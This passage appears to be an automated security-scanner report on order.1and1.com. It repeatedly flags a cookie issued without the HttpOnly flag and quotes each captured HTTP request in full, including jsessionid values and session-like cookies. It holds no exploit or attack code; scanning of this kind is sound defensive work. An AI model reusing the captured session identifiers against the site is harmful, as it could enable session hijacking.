GET /xml/order/FeatureToolsRatepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3348408536a8e000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureWebdesignIstock HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureWebdesignIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=41597db82a3d3000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureWebspaceExplorer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FirstWebsite;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=721928ff566a0c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FirstWebsite HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=5329a8951a3be400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Gtc HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3c94c49b88c62400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Home HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=eshopupselling; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:11:AAABLtRYZ*3Z0AoL3q_g3EClOijRS1_a:1300642686957; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=652e051eff6a6c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Hosting HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=28664dbb52ba0400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Instant HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=352ad3850d1b6400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/International HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/International;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=4b847f0707b00000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
